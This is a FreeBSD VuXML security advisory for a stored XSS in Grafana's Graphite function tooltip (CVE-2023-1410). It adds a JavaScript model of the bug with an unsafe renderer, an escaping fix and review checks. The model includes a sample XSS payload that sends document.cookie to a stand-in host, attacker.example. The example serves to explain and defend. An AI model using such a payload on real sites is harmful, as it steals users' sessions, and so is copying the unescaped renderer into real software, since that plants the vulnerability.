[FREEBSD:955EB3CC-CE0B-11ED-825F-6C3BE5272ACD] Grafana -- Stored XSS in Graphite FunctionDescription tooltip
Severity: Medium
Affected Packages: 3
CVEs: 1
Grafana Labs reports:
When a user adds a Graphite data source, they can then use the data source
in a dashboard. This capability contains a feature to use Functions. Once
a function is selected, a small tooltip appears when hovering over the name
of the function. This tooltip allows you to delete the selected Function
from your query or show the Function Description. However, no sanitization
is done when adding this description to the DOM.
Since it is not uncommon to connect to public data sources, an attacker
could host a Graphite instance with modified Function Descriptions containing
XSS payloads. When the victim uses it in a query and accidentally hovers
over the Function Description, an attacker-controlled XSS payload
will be executed.
The severity of this vulnerability is CVSSv3.1 5.7 Medium
(CVSS: AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N (5.7)).
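The sink Grafana Labs describes, modeled as an added example that is not Grafana's or Graphite's code (the page does not show the real tooltip rendering, and Grafana's front end is TypeScript/React, so this is a plain-string model of the same bug): a function description fetched from an attacker-controlled data source is concatenated into tooltip markup without escaping, beside a hardened version and two checks a reviewer can run over the rendered fragment. The response shape, field names and the `attacker.example` URL are assumptions constructed for the example.

```javascript
// Added example, not code from Grafana or Graphite: models how a function
// description fetched from a Graphite data source reaches a tooltip, and why
// inserting it unescaped is a stored-XSS sink. Pure string code; runs in Node.

// Constructed sample of what a hostile Graphite instance could serve as its
// function metadata. The field names are an assumption for this example, not
// a statement about the real Graphite API.
const functionsResponse = {
  aliasByNode: {
    name: "aliasByNode",
    description: "Takes a seriesList and applies an alias derived from node indices.",
  },
  sumSeries: {
    name: "sumSeries",
    description:
      "Sums series. <img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">",
  },
};

// Vulnerable pattern: the description is concatenated into markup that is
// later assigned to innerHTML (or React's dangerouslySetInnerHTML). Any tag in
// the description becomes live DOM when the tooltip is shown.
function renderTooltipUnsafe(fn) {
  return `<div class="tooltip"><b>${fn.name}</b><p>${fn.description}</p></div>`;
}

// Hardened pattern: escape the characters that can open or close markup before
// the value reaches an HTML sink, so the payload is displayed as literal text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderTooltipSafe(fn) {
  return `<div class="tooltip"><b>${escapeHtml(fn.name)}</b><p>${escapeHtml(fn.description)}</p></div>`;
}

// Review check: which element names appear in the rendered fragment that the
// template itself did not emit? Anything beyond the allowlist came from data.
function unexpectedTags(html, allowed = ["div", "b", "p"]) {
  const seen = new Set();
  for (const m of html.matchAll(/<([a-zA-Z][\w-]*)/g)) {
    const tag = m[1].toLowerCase();
    if (!allowed.includes(tag)) seen.add(tag);
  }
  return [...seen];
}

// Review check: does any tag in the fragment carry an on* event handler?
// Testing the whole string for "onerror=" would be wrong: the escaped, safe
// output still contains that substring as text, which is exactly the point.
function hasEventHandlerAttribute(html) {
  return [...html.matchAll(/<[a-zA-Z][^>]*>/g)].some((m) => /\son\w+\s*=/i.test(m[0]));
}

function demo() {
  const fn = functionsResponse.sumSeries;
  return {
    unsafeTags: unexpectedTags(renderTooltipUnsafe(fn)),              // ["img"]
    unsafeHandler: hasEventHandlerAttribute(renderTooltipUnsafe(fn)), // true
    safeTags: unexpectedTags(renderTooltipSafe(fn)),                  // []
    safeHandler: hasEventHandlerAttribute(renderTooltipSafe(fn)),     // false
  };
}
```

The escaping step belongs at the sink, not at fetch time: a description stored escaped would be double-escaped if the UI later renders it through a safe path. In a React code base the equivalent of `renderTooltipUnsafe` is passing the description through `dangerouslySetInnerHTML`; ordinary JSX text interpolation escapes it the way `renderTooltipSafe` does. The CVSS vector above matches this model: PR:H because adding a data source needs elevated Grafana rights, UI:R because the victim must hover the tooltip.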
Package | Affected Version |
---|---|
pkg:freebsd/grafana9 | < 9.2.15 |
pkg:freebsd/grafana8 | < 8.5.22 |
pkg:freebsd/grafana | < 8.5.22 |
- ID: FREEBSD:955EB3CC-CE0B-11ED-825F-6C3BE5272ACD
- Severity: medium
- Severity from: CVE-2023-1410
- URL: http://vuxml.freebsd.org/freebsd/955eb3cc-ce0b-11ed-825f-6c3be5272acd.html
- Published: 2023-03-14T00:00:00
- Modified: 2023-03-29T00:00:00
- Rights: FreeBSD VuXML Security Team
- Other Advisories
Source | URL |
---|---|
FreeBSD VuXML | https://grafana.com/security/security-advisories/cve-2023-1410/ |